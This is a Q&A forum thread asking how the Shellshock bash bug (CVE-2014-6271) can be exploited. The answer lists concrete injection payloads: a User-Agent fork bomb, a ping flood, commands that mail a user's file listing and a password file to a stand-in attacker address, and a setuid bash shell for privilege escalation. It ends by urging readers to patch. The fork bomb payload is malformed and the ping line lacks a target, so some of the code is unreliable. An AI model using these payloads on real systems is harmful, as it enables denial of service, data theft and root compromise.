Can we exploit the shellshock bash bug?
I read some articles about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack vector / scenario that could exploit the bug?
With access to shellshock bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:
() { :; }; ){ : & };:
Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
Or, somebody could use your server as an attack bot:
() { :; }; ping -s 1000000
Put that on several other servers and you're talking about real bandwidth.
Other attack vectors:
# theft of data
() { :; }; find ~ -print | mail -s "Your files" evil@hacker.com
() { :; }; cat ~/.secret/passwd | mail -s "This password file" evil@hacker.com
# setuid shell
() { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bashThere's endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed. The important part is that you patch your system. NOW! If you still have external-facing servers that are still unpatched, what are you doing still reading this?! Hackers are already doing these things above, and you don't even know it!